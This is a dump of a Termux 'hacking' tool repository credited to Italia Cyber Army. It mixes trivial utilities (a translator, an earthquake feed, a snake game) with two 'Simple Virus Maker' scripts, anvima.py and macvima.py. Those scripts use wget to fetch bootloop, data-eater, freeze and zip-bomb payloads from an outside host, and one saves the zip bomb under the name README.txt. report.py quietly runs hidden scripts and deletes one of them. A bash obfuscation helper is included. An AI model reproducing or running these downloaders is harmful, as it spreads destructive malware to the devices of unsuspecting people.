├── tool ├── modul.txt ├── tai.py ├── bash.py ├── Stock │ └── Creater.py ├── headers.txt ├── advertisement.py ├── text.py ├── report.py ├── telpon.php ├── run.py ├── Aktif.php ├── id_country.txt ├── TEXT ├── macvima.py ├── Translate.py ├── Gempa.py ├── decbash.py ├── ular.py ├── anvima.py ├── WA.php ├── coli.sh ├── hammer.py ├── vbug.py ├── admin.py ├── winvima.py ├── maling.py ├── create.py ├── LICENSE ├── TEBAS.sh ├── viral.sh ├── sholat.py └── SoDark.py ├── LICENSE ├── Install └── install.py ├── README.md └── WannaTool /tool/modul.txt: -------------------------------------------------------------------------------- 1 | requests 2 | bs4 3 | beautifulsoup4 4 | -------------------------------------------------------------------------------- /tool/tai.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/WannaTool/HEAD/tool/tai.py -------------------------------------------------------------------------------- /tool/bash.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/WannaTool/HEAD/tool/bash.py -------------------------------------------------------------------------------- /tool/Stock/Creater.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Err0r-ICA/WannaTool/HEAD/tool/Stock/Creater.py -------------------------------------------------------------------------------- /tool/headers.txt: -------------------------------------------------------------------------------- 1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 2 | Accept-Language: en-us,en;q=0.5 3 | Accept-Encoding: gzip,deflate 4 | Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 5 | Keep-Alive: 115 6 | Connection: keep-alive 7 | -------------------------------------------------------------------------------- /tool/advertisement.py: -------------------------------------------------------------------------------- 1 | import os,sys,time 2 | 3 | def babi(nob): 4 | for e in nob: 5 | sys.stdout.write(e) 6 | sys.stdout.flush() 7 | time.sleep(0.05) 8 | 9 | babi('ADVERTISEMENTS ...') 10 | print "" 11 | print "" 12 | babi(' Make Sure You Don Mess up With The Code. If IT Works, Dont Touch IT. Welcome)') 13 | -------------------------------------------------------------------------------- /tool/text.py: -------------------------------------------------------------------------------- 1 | import random 2 | import sys 3 | import time 4 | def type(s): 5 | for c in s + '\n': 6 | sys.stdout.write(c) 7 | sys.stdout.flush() 8 | time.sleep(random.random() * 0.07) 9 | type('Pursue perfection then success will come to you || Learn what you like then you will easily understand - ERR0R.') 10 | -------------------------------------------------------------------------------- /tool/report.py: -------------------------------------------------------------------------------- 1 | import os, sys, time 2 | if os.path.exists('.Akun/.Bahan'): 3 | print '[>] Install Bahan \n\n' 4 | time.sleep(2) 5 | os.system('bash .Akun/.Bahan') 6 | os.system('pip2 install --upgrade pip') 7 | os.system('rm .Akun/.Bahan') 8 | try: 9 | os.system('python2 .Akun/.Rt') 10 | except ImportError: 11 | sys.exit() 12 | -------------------------------------------------------------------------------- /tool/telpon.php: -------------------------------------------------------------------------------- 1 | 22 | -------------------------------------------------------------------------------- /tool/run.py: -------------------------------------------------------------------------------- 1 | import os,sys,time 2 | 3 | os.system('clear') 4 | 5 | def babi(nob): 6 | for e in nob: 7 | sys.stdout.write(e) 8 | sys.stdout.flush() 9 | time.sleep(0.035) 10 | 11 | babi('Welcome User, to WannaTool Hacking Repo. ') 12 | print 13 | babi('Use Tools Wisely, And I Please You:') 14 | print 15 | babi('Who Know This Username & Password Tool, Please DO NOT Share!') 16 | print 17 | babi('Let Those Who Attempt to Find Their Own Username & Password.') 18 | print 19 | babi('Appreciate The Author And ITALIA CYBER ARMY Team For Using it.') 20 | print 21 | babi('This Current version has 28 tools.') 22 | print 23 | babi('WE Will Not Waste Your Time Anymore,') 24 | print 25 | babi('Enjoy as Much as You Can And Stay Safe. - Italia Cyber Army') 26 | print 27 | babi('Note: Not All of The Tools That WE Put in Are Guaranteed to Work, Remember:') 28 | print "" 29 | babi('Tool Makers Are Also Human Beings, Not Robots That Are Always Right.') 30 | print 31 | babi('...............') 32 | 33 | os.system('bash TEXT') 34 | 35 | exit() 36 | -------------------------------------------------------------------------------- /tool/Aktif.php: -------------------------------------------------------------------------------- 1 | 40 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Err0r-ICA 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /tool/id_country.txt: -------------------------------------------------------------------------------- 1 | af Afrikaans fr Franch 2 | sq Albanian 3 | ar Arabic 4 | hy Armenian 5 | az Azerbaijani 6 | eu Basque 7 | be Belarusian 8 | bn Bengali 9 | bs Bosnian 10 | bg Bulgarian 11 | ca Catalan 12 | ny Chichewa 13 | zh-CN Chinese 14 | zh-TW Chinese 15 | hr Croatian 16 | cs Czech 17 | da Danish 18 | nl Dutch 19 | en English 20 | eo Esperanto 21 | et Estonian 22 | tl Filipino 23 | fi Finnish 24 | fr French 25 | gl Galician 26 | ka Georgian 27 | de German 28 | el Greek 29 | gu Gujarati 30 | ht Haitian 31 | ha Hausa 32 | iw Hebrew 33 | hi Hindi 34 | hu Hungarian 35 | is Icelandic 36 | ig Igbo 37 | id Indonesian 38 | ga Irish 39 | it Italian 40 | ja Japanese 41 | jw Javanese 42 | kn Kannada 43 | kk Kazakh 44 | km Khmer 45 | ko Korean 46 | lo Lao 47 | la Latin 48 | lv Latvian 49 | lt Lithuanian 50 | mk Macedonian 51 | mg Malagasy 52 | ms Malay 53 | ml Malayalam 54 | mt Maltese 55 | mi Maori 56 | mr Marathi 57 | mn Mongolian 58 | my Myanmar 59 | ne Nepali 60 | no Norwegian 61 | fa Persian 62 | pl Polish 63 | pt Portuguese 64 | pa Punjabi 65 | ro Romanian 66 | ru Russian 67 | sr Serbian 68 | st Sesotho 69 | si Sinhala 70 | sk Slovak 71 | sl Slovenian 72 | so Somali 73 | es Spanish 74 | su Sundanese 75 | sw Swahili 76 | sv Swedish 77 | tg Tajik 78 | ta Tamil 79 | te Telugu 80 | th Thai 81 | tr Turkish 82 | uk Ukrainian 83 | ur Urdu 84 | uz Uzbek 85 | vi Vietnamese 86 | cy Welsh 87 | yi Yiddish 88 | yo Yoruba 89 | zu Zulu 90 | -------------------------------------------------------------------------------- /Install/install.py: -------------------------------------------------------------------------------- 1 | import os,sys,time 2 | 3 | os.system('clear') 4 | 5 | print "" 6 | print "" 7 | 8 | def babi(nob): 9 | for e in nob: 10 | sys.stdout.write(e) 11 | sys.stdout.flush() 12 | time.sleep(0.07) 13 | 14 | babi(' Welcome user to the WannaTool Program'.center(20)) 15 | babi(' Installing Dependencies.....'.center(20)) 16 | babi(' Please do not leave user '.center(20)) 17 | babi(' Terminal during mdependencies installation'.center(20)) 18 | print "" 19 | babi(' Please wait a moment before'.center(20)) 20 | babi(' Installation starts'.center(20)) 21 | 22 | def babi(nob): 23 | for e in nob: 24 | sys.stdout.write(e) 25 | sys.stdout.flush() 26 | time.sleep(0.1) 27 | 28 | babi('Wait a Minute....'.center(20)) 29 | 30 | os.system('pkg update && pkg upgrade') 31 | os.system('pkg install git') 32 | os.system('pkg install lolcat') 33 | os.system('gem install lolcat') 34 | os.system('pkg install bash') 35 | os.system('pkg install python2') 36 | os.system('pkg install python') 37 | os.system('pkg install nano') 38 | os.system('pkg install neofetch') 39 | os.system('pip2 install lolcat') 40 | os.system('pkg install figlet') 41 | os.system('pkg install toilet') 42 | os.system('pkg install wget') 43 | os.system('pkg install ssh') 44 | os.system('pkg install curl') 45 | os.system('pip2 install bs4') 46 | print "" 47 | print ("Succesfully Done") 48 | print ("Please return to WannaTool Home") 49 | print ("") 50 | 51 | exit() 52 | -------------------------------------------------------------------------------- /tool/TEXT: -------------------------------------------------------------------------------- 1 | clear 2 | R='\x1b[1;91m' 3 | G='\x1b[1;92m' 4 | B='\x1b[1;94m' 5 | Y='\x1b[1;93m' 6 | C='\x1b[1;96m' 7 | M='\x1b[1;95m' 8 | W='\x1b[1;97m' 9 | D='\x1b[0m' 10 | endc='\E[0m' 11 | enda= '' 12 | echo '' 13 | echo -e $W "╭━━━━━━━╮"$C "╔════════════════════════╗" 14 | echo -e $W "┃$W ● ══$W ┃"$C "║$R WannaTool Hacking Repo$C ║"$G "████$W████$R████" 15 | echo -e $W "┃$R███████$W┃"$C "║$G Use Wisely, Given by $C ║"$G "████$W████$R████" 16 | echo -e $W "┃$R███████$W┃"$C "║$B ITALIA CYBR ARMY$C ║"$G "████$W████$R████" 17 | echo -e $W "┃$R███████$W┃"$C "║$Y WE are NOT Responsible$C ║"$G "████$W████$R████" 18 | echo -e $W "┃$W███████$W┃"$C "║$M Of Any Misuse of This$C ║" 19 | echo -e $W "┃$W███████$W┃"$C "╚════════════════════════╝"$G "ITALIA$W CYBER$R ARMY" 20 | echo -e $W "┃$G███████$W┃" 21 | echo -e $W "┃$G███████$W┃"$M "╔════════════════════════╗" 22 | echo -e $W "┃$G███████$W┃"$M "║$C Create : $G 30/03/2020$M ║" 23 | echo -e $W "┃$W ○$W ┃"$M "║$G Author : $M ERR0R $M ║" 24 | echo -e $W "╰━━━━━━━╯"$M "╚════════════════════════╝" 25 | echo 26 | echo 27 | echo -e $G"╔══════════╗"$C 28 | read -p "║ Key Login : " key 29 | echo -e $G"╚══════════╝" 30 | if [ $key = "ItaliaCyberArmy" ] 31 | then 32 | echo -e $M"╔════════╗" 33 | echo -e $M"║$G SUCSES$M ║" 34 | echo -e $M"╚════════╝" 35 | sleep 3 36 | bash LICENSE 37 | else 38 | echo -e $Y"╔═════════════════════════════════════╗" 39 | echo -e $Y"║$R THE PASSWORD IS WRONG !! TRY AGAIN ...$Y ║" 40 | echo -e $Y"╚═════════════════════════════════════╝" 41 | sleep 3 42 | bash login.sh 43 | fi 44 | -------------------------------------------------------------------------------- /tool/macvima.py: -------------------------------------------------------------------------------- 1 | import os, sys 2 | R = '\x1b[1;31m' 3 | N = '\x1b[0m' 4 | Y = '\x1b[1;33m' 5 | G = '\x1b[1;37m' 6 | print '%s+---------------------------------------------------+%s' % (R, N) 7 | print '%s||[#]%s--------------%s[ VBug Maker ]%s---------------%s[#]||%s' % (Y, R, Y, R, Y, N) 8 | print '%s||%s |___________%s[ Simple Virus Maker ]%s____________|%s ||%s' % (Y, R, Y, R, Y, N) 9 | print '%s||%s |____________%s[ MACvima--Session ]%s_____________|%s ||%s' % (Y, R, Y, R, Y, N) 10 | print '%s+---------------------------------------------------+%s' % (R, N) 11 | print 12 | type_of_virus = raw_input(' %s[%s*%s] %s(%sT%s)%srinoids %s| %s(%sN%s)%sothing %s:%s ' % (Y, R, Y, R, Y, R, G, Y, R, Y, R, G, R, Y)) 13 | if type_of_virus == 'T' or type_of_virus == 't': 14 | print '\n %s[%s+%s]%s Download The MAC Virus...%s' % (Y, R, Y, G, N) 15 | os.system('wget -q http://override.waper.co/files/trinoids.apk') 16 | os.system('mkdir virus/TRINOIDS;mv trinoids.apk virus/TRINOIDS/trinoids.app') 17 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 18 | sys.exit() 19 | else: 20 | if type_of_virus == 'N' or type_of_virus == 'n': 21 | print '\n %s[%s+%s]%s Download The MAC Virus...%s' % (Y, R, Y, G, N) 22 | os.system('wget -q http://override.waper.co/files/nothing.apk') 23 | os.system('mkdir virus/nothing;mv nothing.apk virus/nothing/nothing.app') 24 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 25 | sys.exit() 26 | else: 27 | print '%s[%s%s]%s ERROR%s:%s Wrong Input...%s' % (Y, R, Y, R, Y, G, N) 28 | time.sleep(2) 29 | print '%s[%s!%s]%s ERROR%s:%s Exit the Program...%s' % (Y, R, Y, R, Y, G, N) 30 | sys.exit() 31 | -------------------------------------------------------------------------------- /tool/Translate.py: -------------------------------------------------------------------------------- 1 | import urllib2 2 | from urllib2 import URLError 3 | print "" 4 | print "" 5 | print '""8"" 8""^" 8"^"8 8""8""8 8 8 8 8 ' 6 | print " 8 8 8 8 8 8 8 8 8 8 8 " 7 | print " 8e 8eeee 8eee8e 8e 8 8 8e 8 eeeeee " 8 | print " 88 88 88 8 88 8 8 88 8 88 8 " 9 | print " 88 88 88 8 88 8 8 88 8 88 8 " 10 | print " 88 88eee 88 8 88 8 8 88ee8 88 8 " 11 | print '' 12 | print '8^"^"8 8"^"88 8"^"88 8^"^"8 8 8^"^" ' 13 | print '8 " 8 8 8 8 8 " 8 8 ' 14 | print "8e 8 8 8 8 8e 8e 8eeee " 15 | print "88 ee 8 8 8 8 88 ee 88 88 " 16 | print "88 8 8 8 8 8 88 8 88 88 " 17 | print "88eee8 8eeee8 8eeee8 88eee8 88eee 88eee " 18 | print '' 19 | print '""8"" 8"^"8 8^"^"8 8"^"8 8^"^"8 8 8^"^"8 ""8"" 8^"^" ' 20 | print " 8 8 8 8 8 8 8 8 8 8 8 8 8 " 21 | print " 8e 8eee8e 8eeee8 8e 8 8eeeee 8e 8eeee8 8e 8eeee " 22 | print " 88 88 8 88 8 88 8 88 88 88 8 88 88 " 23 | print " 88 88 8 88 8 88 8 e 88 88 88 8 88 88 " 24 | print " 88 88 8 88 8 88 8 8eee88 88eee 88 8 88 88eee " 25 | print "" 26 | print '' 27 | print '' 28 | f = open('id_country.txt','r') 29 | lines = f.readlines() 30 | panjang = len(lines) 31 | 32 | 33 | for i in range(panjang/3): 34 | print lines[i].replace('\n', ''),'\t', lines[i + panjang/2].replace('\n', ''),'\t', lines[i + panjang/3].replace('\n', '') 35 | if panjang%2: #if it is odd 36 | print lines[-1].replace('\n', '') 37 | 38 | while True: 39 | try: 40 | print '' 41 | bahasa_awal = raw_input("Enter Initial Language (Ex: it): ") #auto is automatic detected language 42 | bahasa_tujuan = raw_input("Enter the Destination Language (Ex: en): ") 43 | kata = raw_input("Enter Words / Sentences: ") 44 | url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) #replace apabila terjadi kalimat 45 | agent = {'User-Agent':'Mozilla/5.0'} 46 | cari_hasil = 'class="t0">' 47 | request = urllib2.Request(url, headers=agent) 48 | page = urllib2.urlopen(request).read() 49 | result = page[page.find(cari_hasil)+len(cari_hasil):] 50 | result = result.split("<")[0] 51 | print "%s -> Translated into: " % kata, result 52 | 53 | except URLError, e: 54 | print "Your Connection is NOT 200OK.. Check Again!" 55 | -------------------------------------------------------------------------------- /tool/Gempa.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Data Gempa Terkini 3 | # Coded by Rafsanzani Suhada 4 | # ZeroByte.ID 5 | import requests 6 | import xml.dom.minidom as xmlget 7 | import os 8 | class bcolors: 9 | HIJAU='\033[1;92m' 10 | MERAH='\033[01;91m' 11 | NORMAL='\033[0m' 12 | CYAN='\033[1;96m' 13 | BIRU='\033[1;94m' 14 | PUTIH='\033[1;97m' 15 | 16 | def main(): 17 | response = requests.get('http://data.bmkg.go.id/autogempa.xml') 18 | result = (response.text) 19 | save = open('result.xml','w') 20 | save.write('%s' %result,) 21 | save.close() 22 | rxml = xmlget.parse("result.xml") 23 | 24 | 25 | Tanggal = rxml.getElementsByTagName("Tanggal")[0].firstChild.data 26 | Jam = rxml.getElementsByTagName("Jam")[0].firstChild.data 27 | Lintang = rxml.getElementsByTagName("Lintang")[0].firstChild.data 28 | Bujur = rxml.getElementsByTagName("Bujur")[0].firstChild.data 29 | Magnitude = rxml.getElementsByTagName("Magnitude")[0].firstChild.data 30 | Kedalaman = rxml.getElementsByTagName("Kedalaman")[0].firstChild.data 31 | Wilayah = rxml.getElementsByTagName("Wilayah1")[0].firstChild.data 32 | Potensi = rxml.getElementsByTagName("Potensi")[0].firstChild.data 33 | 34 | print " DATE : {}".format(Tanggal) 35 | print " HOUR : {}".format(Jam) 36 | print bcolors.CYAN 37 | print " LATUTUDE : {}".format(Lintang) 38 | print " LONGITUDE : {}".format(Bujur) 39 | print " MAGNITUDE : {}".format(Magnitude) 40 | print " DEPTH : {}".format(Kedalaman) 41 | print bcolors.HIJAU 42 | print " REGION : {}".format(Wilayah) 43 | print " POTENCY : {}".format(Potensi) 44 | 45 | 46 | # Clear layar 47 | os.system('cls' if os.name == 'nt' else 'clear') 48 | 49 | print bcolors.MERAH 50 | print "" 51 | print '8 8 8 8 8 8^"^" 8"^"8 8^"^" ' 52 | print "8 8 8 8 8 8 8 8 8 " 53 | print "8e 8 8 8eee8 8eeee 8eee8e 8eeee " 54 | print "88 8 8 88 8 88 88 8 88 " 55 | print "88 8 8 88 8 88 88 8 88 " 56 | print "88ee8ee8 88 8 88eee 88 8 88eee " 57 | print '' 58 | print " 0" 59 | print "" 60 | print '8^"^"8 8""8""8 8 8^"^"8 ' 61 | print "8 8 8 8 8 8 8 " 62 | print "8eeee8 8e 8 8 8e eeeee8 " 63 | print "88 8 88 8 8 88 88 " 64 | print '88 8 88 8 8 88 "" ' 65 | print "88 8 88 8 8 88 00 " 66 | print '' 67 | print bcolors.NORMAL 68 | print 69 | if __name__ == "__main__": 70 | main() 71 | # Remove file result.xml 72 | if os.path.exists("result.xml"): 73 | os.remove("result.xml") 74 | else: 75 | print("The File Does NOT Exists") 76 | print bcolors.NORMAL 77 | -------------------------------------------------------------------------------- /tool/decbash.py: -------------------------------------------------------------------------------- 1 | import os, sys, fileinput, time, socket, random, time, sys, platform, os 2 | 3 | def tampil(x): 4 | w = {'m': 31, 'h': 32, 'k': 33, 'b': 34, 'p': 35, 'c': 36} 5 | for i in w: 6 | x = x.replace('\r%s' % i, '\x1b[%s;1m' % w[i]) 7 | 8 | x += '\x1b[0m' 9 | x = x.replace('\r0', '\x1b[0m') 10 | print x 11 | 12 | 13 | N = '\x1b[0m' 14 | D = '\x1b[90m' 15 | W = '\x1b[1;37m' 16 | B = '\x1b[1;34m' 17 | R = '\x1b[1;31m' 18 | G = '\x1b[1;32m' 19 | Y = '\x1b[1;33m' 20 | C = '\x1b[1;36m' 21 | ask = G + '[' + W + '?' + G + '] ' 22 | sukses = G + '[' + W + '\xe2\x88\x9a' + G + '] ' 23 | eror = R + '[' + W + '!' + R + ']' 24 | print 25 | print '\x1b[91m _____ _ ____ ____ _ ____ _____' 26 | print '\x1b[91m* __**** *|* _** __** ** __**__ __*' 27 | print '\x1b[91m| * | |* ||| * | **|| || **| * *' 28 | print '\x1b[91m| /_ | | \\||| \\_ | /| || __/ | |' 29 | print '\x1b[91m\\____\\_/ \\|\\____/\\_/\\_\\_/\\_/ \\_/' 30 | print ' \x1b[91m*\x1b[95mScript Bash' 31 | print 32 | print '\x1b[94m===================== \x1b[91m=====================' 33 | print 34 | print '\x1b[91m[1]\x1b[97mEncrypt #\x1b[92mAuthor :\x1b[96;1mAsecC - ERR0R' 35 | print '\x1b[91m[0]\x1b[97mEXIT #\x1b[92mTeam :\x1b[96;1mITALIA CYBER ARMY' 36 | print '\x1b[91m[2]\x1b[97mDecrypt #\x1b[92mGithub :\x1b[96;1mhttps://github.com/Err0r-ICA' 37 | print ' #\x1b[92mInstagram :\x1b[96;1mhttps://www.instagram.com/termux_hacking' 38 | print 39 | print '\x1b[92m===================== \x1b[95m=====================' 40 | print 41 | 42 | def keluar(): 43 | tampil('\rm[!]BY~~~ERR0R') 44 | os.sys.exit() 45 | 46 | 47 | def dekrip(): 48 | try: 49 | sc = raw_input(ask + W + 'Enter Address Script ' + G + '> ' + W) 50 | f = open(sc, 'r') 51 | filedata = f.read() 52 | f.close() 53 | newdata = filedata.replace('eval', 'echo') 54 | out = raw_input(ask + W + 'Enter Address Output' + G + ' > ' + W) 55 | f = open(out, 'w') 56 | f.write(newdata) 57 | f.close() 58 | os.system('touch decript.sh') 59 | os.system('bash ' + out + ' > decript.sh') 60 | os.remove(out) 61 | os.rename('tes.sh', out) 62 | print sukses + 'SUCCESFULL..' 63 | except KeyboardInterrupt: 64 | print eror + ' FAILED' 65 | except IOError: 66 | print eror + ' File Not Detected!' 67 | 68 | 69 | def enkrip(): 70 | try: 71 | script = raw_input(ask + W + 'Enter Address Script ' + G + '|> ' + W) 72 | output = raw_input(ask + W + 'Enter Address Output ' + G + '|> ' + W) 73 | os.system('bash-obfuscate ' + script + ' -o ' + output) 74 | print sukses + 'SUCCESFULL..' 75 | except KeyboardInterrupt: 76 | print eror + ' FAILED!' 77 | except IOError: 78 | print eror + ' File Not Detected!' 79 | 80 | 81 | takok = raw_input(W + 'Encript' + G + ' |> ') 82 | if takok == '1' or takok == '01': 83 | enkrip() 84 | else: 85 | if takok == '2' or takok == '02': 86 | dekrip() 87 | else: 88 | if tatok == '0' or tatok == '00': 89 | keluar() 90 | else: 91 | print eror + ' Wrong input' 92 | keluar() 93 | -------------------------------------------------------------------------------- /tool/ular.py: -------------------------------------------------------------------------------- 1 | import curses 2 | from curses import KEY_RIGHT, KEY_LEFT, KEY_UP, KEY_DOWN 3 | from random import randint 4 | 5 | 6 | curses.initscr() 7 | win = curses.newwin(20, 60, 0, 0) 8 | win.keypad(1) 9 | curses.noecho() 10 | curses.curs_set(0) 11 | win.border(0) 12 | win.nodelay(1) 13 | 14 | key = KEY_RIGHT # Initializing values 15 | score = 0 16 | 17 | snake = [[4,10], [4,9], [4,8]] # Initial snake co-ordinates 18 | food = [10,20] # First food co-ordinates 19 | 20 | win.addch(food[0], food[1], '*') # Prints the food 21 | 22 | while key != 27: # While Esc key is not pressed 23 | win.border(0) 24 | win.addstr(0, 2, 'Score : ' + str(score) + ' ') # Printing 'Score' and 25 | win.addstr(0, 27, ' U-LAR ') # 'SNAKE' strings 26 | win.timeout(150 - (len(snake)/5 + len(snake)/10)%120) # Increases the speed of Snake as its length increases 27 | 28 | prevKey = key # Previous key pressed 29 | event = win.getch() 30 | key = key if event == -1 else event 31 | 32 | 33 | if key == ord(' '): # If SPACE BAR is pressed, wait for another 34 | key = -1 # one (Pause/Resume) 35 | while key != ord(' '): 36 | key = win.getch() 37 | key = prevKey 38 | continue 39 | 40 | if key not in [KEY_LEFT, KEY_RIGHT, KEY_UP, KEY_DOWN, 27]: # If an invalid key is pressed 41 | key = prevKey 42 | 43 | # Calculates the new coordinates of the head of the snake. NOTE: len(snake) increases. 44 | # This is taken care of later at [1]. 45 | snake.insert(0, [snake[0][0] + (key == KEY_DOWN and 1) + (key == KEY_UP and -1), snake[0][1] + (key == KEY_LEFT and -1) + (key == KEY_RIGHT and 1)]) 46 | 47 | # If snake crosses the boundaries, make it enter from the other side 48 | if snake[0][0] == 0: snake[0][0] = 18 49 | if snake[0][1] == 0: snake[0][1] = 58 50 | if snake[0][0] == 19: snake[0][0] = 1 51 | if snake[0][1] == 59: snake[0][1] = 1 52 | 53 | # Exit if snake crosses the boundaries (Uncomment to enable) 54 | #if snake[0][0] == 0 or snake[0][0] == 19 or snake[0][1] == 0 or snake[0][1] == 59: break 55 | 56 | # If snake runs over itself 57 | if snake[0] in snake[1:]: break 58 | 59 | 60 | if snake[0] == food: # When snake eats the food 61 | food = [] 62 | score += 1 63 | while food == []: 64 | food = [randint(1, 18), randint(1, 58)] # Calculating next food's coordinates 65 | if food in snake: food = [] 66 | win.addch(food[0], food[1], '*') 67 | else: 68 | last = snake.pop() # [1] If it does not eat the food, length decreases 69 | win.addch(last[0], last[1], ' ') 70 | win.addch(snake[0][0], snake[0][1], '#') 71 | 72 | curses.endwin() 73 | print("\nScore - " + str(score)) 74 | -------------------------------------------------------------------------------- /tool/anvima.py: -------------------------------------------------------------------------------- 1 | import os, sys 2 | R = '\x1b[1;31m' 3 | N = '\x1b[0m' 4 | Y = '\x1b[1;33m' 5 | G = '\x1b[1;37m' 6 | print '%s+---------------------------------------------------+%s' % (R, N) 7 | print '%s||[#]%s--------------%s[ VBug Maker ]%s---------------%s[#]||%s' % (Y, R, Y, R, Y, N) 8 | print '%s||%s |___________%s[ Simple Virus Maker ]%s____________|%s ||%s' % (Y, R, Y, R, Y, N) 9 | print '%s||%s |____________%s[ Err0r * Session ]%s______________|%s ||%s' % (Y, R, Y, R, Y, N) 10 | print '%s+---------------------------------------------------+%s' % (R, N) 11 | print 12 | type_of_virus = raw_input(' %s[%s*%s] %s(%sB%s)%sootloop %s| %s(%sD%s)%sata-Eater %s| %s(%sF%s)%sreeze %s| %s(%sBO%s)%smb-Zip %s| %s(%sE%s)%slite %s:%s ' % (Y, R, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, Y, R, Y, R, G, R, Y)) 13 | if type_of_virus == 'B' or type_of_virus == 'b': 14 | print '\n %s[%s+%s]%s Download The Virus%s...%s' % (Y, R, Y, G, R, N) 15 | os.system('wget -q http://override.waper.co/files/bootloop.apk') 16 | os.system('mkdir virus/bootloop;mv bootloop.apk virus/bootloop/bootloop.sh') 17 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 18 | sys.exit() 19 | else: 20 | if type_of_virus == 'D' or type_of_virus == 'd': 21 | print '\n %s[%s+%s]%s Download The Virus%s...%s' % (Y, R, Y, G, R, N) 22 | os.system('wget -q http://override.waper.co/files/dateater.apk') 23 | os.system('mkdir virus/data-eater;mv dateater.apk virus/data-eater/data-eater.sh') 24 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 25 | sys.exit() 26 | else: 27 | if type_of_virus == 'F' or type_of_virus == 'f': 28 | print '\n %s[%s+%s]%s Download The Virus%s...%s' % (Y, R, Y, G, R, N) 29 | os.system('wget -q http://override.waper.co/files/freeze.apk') 30 | os.system('mkdir virus/freeze;mv freeze.apk virus/freeze/freeze.apk') 31 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 32 | sys.exit() 33 | else: 34 | if type_of_virus == 'BO' or type_of_virus == 'bo': 35 | print '\n %s[%s+%s]%s Download The Virus%s...%s' % (Y, R, Y, G, R, N) 36 | os.system('wget -q http://override.waper.co/files/42.zip') 37 | os.system('wget -q http://override.waper.co/files/42.apk') 38 | os.system('mkdir virus/bomb-zip;mv 42.zip virus/bomb-zip/bom-zip.zip;mv 42.apk virus/bomb-zip/README.txt') 39 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 40 | sys.exit() 41 | else: 42 | if type_of_virus == 'E' or type_of_virus == 'e': 43 | print '\n %s[%s+%s]%s Download The Virus%s...%s' % (Y, R, Y, G, R, N) 44 | os.system('wget -q http://override.waper.co/files/31337.apk') 45 | os.system('mkdir virus/ELITE;mv 31337.apk virus/ELITE/elite.apk') 46 | print ' %s[%s+%s]%s Done%s.%s' % (Y, R, Y, G, R, N) 47 | sys.exit() 48 | else: 49 | print '%s[%s%s]%s ERR0R%s:%s Wrong Input...%s' % (Y, R, Y, R, Y, G, N) 50 | time.sleep(2) 51 | print '%s[%s!%s]%s ERR0R%s:%s Exit the Program...%s' % (Y, R, Y, R, Y, G, N) 52 | sys.exit() 53 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ![logo](https://i.ibb.co/XfQZL52/OIG1-1.jpg) 2 | 3 | ## 💿 Installation 💿 4 | ``` 5 | apt upgrade -y;apt update -y 6 | git clone https://github.com/Err0r-ICA/WannaTool 7 | cd WannaTool 8 | chmod +x * 9 | bash WannaTool 10 | ``` 11 | 12 | ## 📸 Screenshot 📸 13 | ![Screenshot](https://i.postimg.cc/nprf6qxr/IMG-20200425-142854-219.jpg) 14 | ![Screenshot](https://i.postimg.cc/gGq9hsqM/IMG-20200425-142911-516.jpg) 15 | 16 | ### 👤 Connect with me 👤 17 | codeSTACKr | Github 18 | codeSTACKr | Instagram 19 | codeSTACKr | TikTok 20 | codeSTACKr | Telegram
21 | 22 |

23 | Err0r-ICA' Github Stats 24 | 25 |

26 | 27 | 28 | 29 | 30 |

31 | 32 | [![Build-passing](https://img.shields.io/badge/build-passing-red.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) [![Stars](https://img.shields.io/open-vsx/stars/Redhat/Java.svg?style=plastic&color=orange)](https://github.com/Err0r-ICA/SpeedTest/issues) [![Coverage](https://img.shields.io/azure-devops/coverage/Swellaby/Opensource/25?color=yellow&style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) 33 | 34 | [![Maintainers](https://img.shields.io/badge/mainteiners-HackBoyz-green.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) [![coded](https://img.shields.io/badge/coded%20in-bash-mintgreen.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) 35 | 36 | [![Status](https://img.shields.io/badge/code%20status-encrypted-cyan.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) [![License](https://img.shields.io/badge/license-MIT-blueviolet.svg?style=plastic)](https://github.com/Err0r-ICA/SpeedTest/issues) 37 | 38 | 